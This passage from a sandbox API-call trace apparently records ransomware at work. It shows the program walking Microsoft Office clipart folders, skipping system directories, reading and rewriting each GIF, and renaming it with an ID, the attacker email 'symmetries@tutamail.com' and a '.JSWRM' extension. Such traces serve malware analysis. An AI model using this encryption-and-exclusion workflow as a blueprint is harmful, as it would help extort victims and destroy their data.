[0100.053] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x980) returned 0x20c6c0 [0100.053] ReadFile (in: hFile=0x338, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x980, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0x980, lpOverlapped=0x0) returned 1 [0100.054] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.055] WriteFile (in: hFile=0x338, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0x980, lpOverlapped=0x0) returned 1 [0100.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0100.055] CloseHandle (hObject=0x338) returned 1 [0100.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0100.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0100.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0100.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0100.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0100.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0100.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0100.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0100.055] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02055_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02055_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02055_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02055_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0100.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0100.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0100.056] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110a3267, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x37d, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB02073_.GIF", cAlternateFileName="")) returned 1 [0100.056] lstrcmpiW (lpString1="WB02073_.GIF", lpString2=".") returned 1 [0100.056] lstrcmpiW (lpString1="WB02073_.GIF", lpString2="..") returned 1 [0100.056] lstrcmpiW (lpString1="WB02073_.GIF", lpString2="...") returned 1 [0100.056] lstrcmpiW (lpString1="WB02073_.GIF", lpString2="windows") returned -1 [0100.056] lstrcmpiW (lpString1="WB02073_.GIF", lpString2="recovery") returned 1 [0100.056] lstrcmpiW (lpString1="WB02073_.GIF", lpString2="perflogs") returned 1 [0100.056] lstrcmpiW (lpString1="WB02073_.GIF", lpString2="documents and settings") returned 1 [0100.056] lstrcmpiW (lpString1="WB02073_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.056] lstrcmpiW (lpString1="WB02073_.GIF", lpString2="system volume information") returned 1 [0100.056] lstrcmpiW (lpString1="WB02073_.GIF", lpString2="msocache") returned 1 [0100.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0100.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02073_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02073_.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02073_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0100.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0100.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02073_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02073_.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02073_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0100.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0100.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0100.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0100.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02073_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02073_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.057] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=893) returned 1 [0100.057] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x370) returned 0x20e550 [0100.057] ReadFile (in: hFile=0x338, lpBuffer=0x20e550, nNumberOfBytesToRead=0x370, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e534*=0x370, lpOverlapped=0x0) returned 1 [0100.059] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.059] WriteFile (in: hFile=0x338, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e530*=0x370, lpOverlapped=0x0) returned 1 [0100.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0100.059] CloseHandle (hObject=0x338) returned 1 [0100.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0100.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0100.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0100.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0100.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0100.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0100.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0100.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0100.059] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02073_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02073_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02073_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02073_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0100.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0100.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0100.060] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110a3267, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x516, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB02074_.GIF", cAlternateFileName="")) returned 1 [0100.060] lstrcmpiW (lpString1="WB02074_.GIF", lpString2=".") returned 1 [0100.060] lstrcmpiW (lpString1="WB02074_.GIF", lpString2="..") returned 1 [0100.060] lstrcmpiW (lpString1="WB02074_.GIF", lpString2="...") returned 1 [0100.060] lstrcmpiW (lpString1="WB02074_.GIF", lpString2="windows") returned -1 [0100.060] lstrcmpiW (lpString1="WB02074_.GIF", lpString2="recovery") returned 1 [0100.060] lstrcmpiW (lpString1="WB02074_.GIF", lpString2="perflogs") returned 1 [0100.060] lstrcmpiW (lpString1="WB02074_.GIF", lpString2="documents and settings") returned 1 [0100.060] lstrcmpiW (lpString1="WB02074_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.060] lstrcmpiW (lpString1="WB02074_.GIF", lpString2="system volume information") returned 1 [0100.060] lstrcmpiW (lpString1="WB02074_.GIF", lpString2="msocache") returned 1 [0100.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02074_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02074_.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02074_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0100.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02074_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02074_.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02074_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0100.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0100.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0100.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0100.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02074_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02074_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.061] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1302) returned 1 [0100.061] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x510) returned 0x230a00 [0100.061] ReadFile (in: hFile=0x338, lpBuffer=0x230a00, nNumberOfBytesToRead=0x510, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x510, lpOverlapped=0x0) returned 1 [0100.063] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.063] WriteFile (in: hFile=0x338, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x510, lpOverlapped=0x0) returned 1 [0100.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0100.063] CloseHandle (hObject=0x338) returned 1 [0100.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0100.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0100.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0100.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0100.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0100.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0100.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0100.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0100.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.064] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02074_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02074_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02074_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02074_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0100.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0100.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0100.065] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110a3267, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2fd, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB02077_.GIF", cAlternateFileName="")) returned 1 [0100.065] lstrcmpiW (lpString1="WB02077_.GIF", lpString2=".") returned 1 [0100.065] lstrcmpiW (lpString1="WB02077_.GIF", lpString2="..") returned 1 [0100.065] lstrcmpiW (lpString1="WB02077_.GIF", lpString2="...") returned 1 [0100.065] lstrcmpiW (lpString1="WB02077_.GIF", lpString2="windows") returned -1 [0100.065] lstrcmpiW (lpString1="WB02077_.GIF", lpString2="recovery") returned 1 [0100.065] lstrcmpiW (lpString1="WB02077_.GIF", lpString2="perflogs") returned 1 [0100.065] lstrcmpiW (lpString1="WB02077_.GIF", lpString2="documents and settings") returned 1 [0100.065] lstrcmpiW (lpString1="WB02077_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.065] lstrcmpiW (lpString1="WB02077_.GIF", lpString2="system volume information") returned 1 [0100.065] lstrcmpiW (lpString1="WB02077_.GIF", lpString2="msocache") returned 1 [0100.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0100.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02077_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02077_.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02077_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0100.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0100.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02077_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02077_.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02077_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0100.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0100.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0100.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0100.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02077_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02077_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.066] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=765) returned 1 [0100.066] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2f0) returned 0x20b1f8 [0100.066] ReadFile (in: hFile=0x338, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x2f0, lpOverlapped=0x0) returned 1 [0100.068] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.068] WriteFile (in: hFile=0x338, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x2f0, lpOverlapped=0x0) returned 1 [0100.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.068] CloseHandle (hObject=0x338) returned 1 [0100.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0100.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.068] MultiByteToWideChar (in: CodePage=0x0, 